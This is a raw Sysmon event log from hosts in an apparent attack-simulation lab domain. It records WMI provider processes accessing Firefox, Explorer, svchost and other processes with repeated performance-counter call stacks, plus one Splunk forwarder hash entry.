Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150917Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.500{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1320-60CA-0E01-00000000D101}1072C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150916Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.500{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-1320-60CA-0E01-00000000D101}1072C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150915Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.500{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150914Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.499{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150913Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.499{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-131D-60CA-0B01-00000000D101}1192C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150912Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.499{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-131D-60CA-0B01-00000000D101}1192C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150911Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.499{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FDF-60CA-9000-00000000D101}4560C:\Windows\System32\msdtc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150910Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.499{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FDF-60CA-9000-00000000D101}4560C:\Windows\System32\msdtc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150909Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.498{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FDB-60CA-8D00-00000000D101}648C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150908Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.498{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FDB-60CA-8D00-00000000D101}648C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 23542300x8000000000000000104810Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:45:41.942{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EECA1B90D604B694DD98478F697A313F,SHA256=AB2DF7260403B923A840A7009AAC913DD0792B88F18F23D6713EEE3D4048D7DD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000150907Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.498{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150906Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.498{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150905Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.498{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD9-60CA-8B00-00000000D101}1988C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150904Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.498{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD9-60CA-8B00-00000000D101}1988C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150903Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.498{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD9-60CA-8600-00000000D101}2996C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbe